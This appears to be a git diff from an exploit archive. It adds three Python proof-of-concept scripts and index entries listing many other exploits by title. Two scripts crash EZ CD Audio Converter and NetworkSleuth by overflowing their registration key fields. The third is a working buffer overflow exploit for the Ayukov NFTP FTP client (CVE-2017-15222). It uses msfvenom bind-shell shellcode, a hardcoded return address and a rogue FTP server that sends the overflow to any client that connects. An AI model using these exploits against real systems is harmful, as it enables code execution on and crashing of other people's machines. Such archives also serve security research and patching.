b/exploits/windows_x86-64/dos/46068.py 
@@ -0,0 +1,28 @@ +# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC) +# Date: 2018-12-30 +# Exploit Author: Achilles +# Vendor Homepage: https://www.poikosoft.com/ +# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe +# Exploit Author: Achilles +# Tested Version: 8.0.7 (64-bit) +# Tested on: Windows 7 x64 +# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow +# Steps to Produce the Crash:=20 +# 1.- Run python code : EZ_CD_Audio_Converter.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open EZ_CD_Audio_Converter 'Press Activate' +# 4.- Paste the content of EVIL.txt into the field: 'Key' +# 5.- And you will see a crash. + +#!/usr/bin/env python + +buffer = "\x41" * 10000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/46069.py b/exploits/windows_x86-64/dos/46069.py new file mode 100755 index 000000000..5e93d7f28 --- /dev/null +++ b/exploits/windows_x86-64/dos/46069.py 
@@ -0,0 +1,25 @@ +# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2018-12-27 +# Vendor Homepage: www.nsauditor.com +# Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe +# Tested Version: 3.0.0.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python NetworkSleuth_3.0.0.0.py +# 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard +# 3.- Open NetworkSleuth +# 4.- Register -> Enter Registration Code... +# 5.- Name: -> l4m5 +# 6.- Paste ClipBoard on "Key:" +# 7.- OK +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 276 +f = open ("NetworkSleuth_3.0.0.0.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/46070.py b/exploits/windows_x86/local/46070.py new file mode 100755 index 000000000..0e018923c --- /dev/null +++ b/exploits/windows_x86/local/46070.py 
@@ -0,0 +1,71 @@ +# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow +# Date: 2018-12-29 +# Exploit Author: Uday Mittal +# Vendor Homepage: http://www.ayukov.com/nftp/ +# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip +# Version : below 2.0 +# Tested on: Microsoft Windows XP SP3 +# CVE: CVE-2017-15222 + +# EIP Location: 4116 +# Buffer starts from : 4121 +# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) +# badchars: '\x00\x0A\x0D\x40' +# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python + +import socket + +IP = '192.168.43.28' +port = 21 + +buf = "" +buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29" +buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e" +buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15" +buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f" +buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f" +buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad" +buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64" +buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61" +buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c" +buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9" +buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9" +buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9" +buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1" +buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7" +buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f" +buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89" +buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05" +buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe" +buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba" +buf += 
"\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15" +buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3" +buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32" +buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4" +buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b" +buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7" +buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72" +buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd" +buf += "\xa4\x03\x5f\xc4" + +evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425 + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((IP, port)) + s.listen(20) + print("[i] FTP Server started on port: "+str(port)+"\r\n") +except: + print("[!] Failed to bind the server to port: "+str(port)+"\r\n") + +while True: + conn, addr = s.accept() + conn.send('220 Welcome!' + '\r\n') + print conn.recv(1024) + conn.send('331 OK.\r\n') + print conn.recv(1024) + conn.send('230 OK.\r\n') + print conn.recv(1024) + conn.send(evil + '\r\n') + print conn.recv(1024) + conn.send('257' + '\r\n') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9fd0ff253..a1073f50f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -5979,6 +5979,8 @@ id,file,description,date,author,type,platform,port
 44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux,
 44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows,
 44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware,
+46068,exploits/windows_x86-64/dos/46068.py,"EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)",2019-01-02,Achilles,dos,windows_x86-64,
+46069,exploits/windows_x86-64/dos/46069.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64,
 44717,exploits/windows_x86/dos/44717.txt,"FTPShell Server 6.80 - Denial of Service",2018-05-23,"Hashim Jawad",dos,windows_x86,
 44721,exploits/linux/dos/44721.py,"Siemens SCALANCE S613 - Remote Denial of Service",2018-05-23,t4rkd3vilz,dos,linux,
 44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android,
@@ -6229,6 +6231,9 @@ id,file,description,date,author,type,platform,port
 46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
+46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64,
+46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple,
+46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9985,6 +9990,7 @@ id,file,description,date,author,type,platform,port
 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android,
 44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
+46070,exploits/windows_x86/local/46070.py,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow",2019-01-02,"Uday Mittal",local,windows_x86,
 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows,
 44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
 44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows,
@@ -17043,6 +17049,8 @@ id,file,description,date,author,type,platform,port
 46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple,
 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
+46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
+46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39902,6 +39910,8 @@ id,file,description,date,author,type,platform,port
 44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php,
 44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
 44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,
+46066,exploits/php/webapps/46066.txt,"WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection",2019-01-02,Kaimi,webapps,php,80
+46067,exploits/php/webapps/46067.txt,"Frog CMS 0.9.5 - Cross-Site Scripting",2019-01-02,WangDudu,webapps,php,80
 44706,exploits/php/webapps/44706.txt,"EasyService Billing 1.0 - SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
 44707,exploits/php/webapps/44707.txt,"EasyService Billing 1.0 - 'p1' SQL Injection",2018-05-23,AkkuS,webapps,php,
 44708,exploits/php/webapps/44708.txt,"MySQL Smart Reports 1.0 - 'id' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
@@ -40537,13 +40547,14 @@ id,file,description,date,author,type,platform,port
 46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80
 46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
 46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443
-46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,
-46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,
+46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,80
+46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,80
 46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php,
-46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,
+46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,80
 46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php,
 46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php,
-46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,
+46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80
 46055,exploits/php/webapps/46055.txt,"WordPress Plugin Audio Record 1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,
-46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,
-46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,
+46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80
+46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80
+46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php,